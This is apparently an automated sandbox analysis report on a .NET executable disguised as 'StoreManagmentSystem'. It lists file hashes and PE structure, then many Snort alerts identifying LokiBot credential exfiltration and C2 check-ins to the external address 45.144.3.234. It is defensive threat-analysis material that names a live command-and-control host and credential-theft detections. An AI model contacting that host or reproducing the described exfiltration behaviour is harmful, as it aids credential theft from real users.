                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.850143173412625
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File size:667648
                                            MD5:2aaa15e28835feda9a2e223d82db2126
                                            SHA1:2c4ace288456010a2717597b192827cd9f7ec771
                                            SHA256:e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
                                            SHA512:3d17642e4e6afdbe84e15b962dd008c0b0a916f70020dc9125cbe2bdea86a316bb7dc99c59b96b88dfac2a5bc8d33b400ad0ec7bc514557a3798d5361b198908
                                            SSDEEP:12288:KF5znqopcqsY9N/uJkAbmKaLDpMiGFE/XahZSlQP/P9Ji8L:ahpcxLbm7DZLa/Sqv93L
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..&..........rD... ...`....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4a4472
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0xC1FEB99E [Sun Feb 19 02:19:10 2073 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa4420 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa6000 | 0x5c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa4404 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa2478 | 0xa2600 | False | 0.891697038587 | data | 7.85676588796 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa6000 | 0x5c4 | 0x600 | False | 0.425130208333 | data | 4.11727870929 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xa6090 | 0x334 | data | |
RT_MANIFEST | 0xa63d4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                            Imports

DLL | Import
mscoree.dll | _CorExeMain

                                            Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2020
Assembly Version | 1.0.0.0
InternalName | d.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | StoreManagmentSystem
ProductVersion | 1.0.0.0
FileDescription | StoreManagmentSystem
OriginalFilename | d.exe

                                            Network Behavior

                                            Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/02/20-11:52:41.429220 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49712 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.429220 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49712 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.429220 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49712 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.429220 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49712 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.861237 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49713 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.861237 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49713 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.861237 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49713 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:41.861237 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49713 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.190739 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49714 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.190739 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49714 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.190739 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49714 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.190739 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49714 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.317408 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49714 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:42.691672 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49715 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.691672 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49715 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.691672 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49715 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.691672 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49715 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:42.818739 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49715 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:43.223645 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49716 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.223645 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49716 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.223645 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49716 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.223645 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49716 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.354863 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49716 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:43.786463 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49717 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.786463 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49717 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.786463 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49717 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.786463 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49717 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:43.916834 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49717 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:44.367508 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49718 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.367508 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49718 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.367508 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49718 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.367508 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49718 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.495389 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49718 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:44.817786 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49720 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.817786 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49720 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.817786 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49720 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.817786 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49720 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:44.947918 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49720 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:45.670062 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49721 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:45.670062 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49721 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:45.670062 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49721 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:45.670062 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49721 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:45.795234 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49721 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:46.501885 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49722 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:46.501885 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49722 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:46.501885 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49722 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:46.501885 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49722 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:46.626796 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49722 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:47.200282 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49723 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.200282 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49723 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.200282 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49723 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.200282 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49723 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.331655 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49723 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:47.619407 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49724 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.619407 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49724 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.619407 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49724 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.619407 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49724 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:47.748180 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49724 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:48.049426 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49725 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.049426 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49725 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.049426 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49725 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.049426 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49725 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.184302 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49725 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:48.489829 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49726 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.489829 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49726 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.489829 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49726 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.489829 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49726 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.616771 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49726 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:48.881874 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49727 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.881874 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49727 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.881874 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49727 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:48.881874 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49727 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.007215 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49727 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:49.288846 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49728 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.288846 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49728 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.288846 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49728 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.288846 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49728 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.418237 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49728 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:49.753380 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49729 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.753380 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49729 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.753380 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49729 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.753380 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49729 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:49.881766 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49729 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:50.187410 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49730 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.187410 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49730 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.187410 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49730 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.187410 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49730 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.313590 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49730 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:50.629810 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49731 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.629810 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49731 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.629810 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49731 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.629810 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49731 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:50.756249 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49731 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:51.071179 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49732 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.071179 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49732 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.071179 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49732 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.071179 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49732 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.201095 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49732 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:51.489197 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49733 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.489197 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49733 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.489197 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49733 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.489197 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49733 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.665470 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49733 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:51.988951 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49734 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.988951 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49734 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.988951 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49734 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:51.988951 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49734 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.132110 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49734 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:52.491063 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49735 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.491063 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49735 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.491063 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49735 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.491063 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49735 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.618567 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49735 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:52.880420 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49737 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.880420 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49737 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.880420 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49737 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:52.880420 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49737 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.017894 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49737 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:53.327474 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49740 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.327474 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49740 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.327474 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49740 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.327474 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49740 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.459325 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49740 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:53.777770 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49741 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.777770 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.777770 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.777770 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49741 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:53.903447 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49741 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:54.204573 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49742 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.204573 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49742 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.204573 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49742 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.204573 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49742 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.341795 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49742 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:54.660318 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49743 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.660318 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.660318 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.660318 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49743 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:54.786220 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49743 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:55.114402 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.114402 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.114402 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.114402 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49744 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.244731 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49744 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:55.544487 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.544487 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.544487 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.544487 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49745 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.674253 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49745 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:55.981452 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.981452 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.981452 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:55.981452 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.194096 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49746 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:56.489115 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.489115 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.489115 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.489115 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.615647 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49747 | 45.144.3.234 | 192.168.2.6
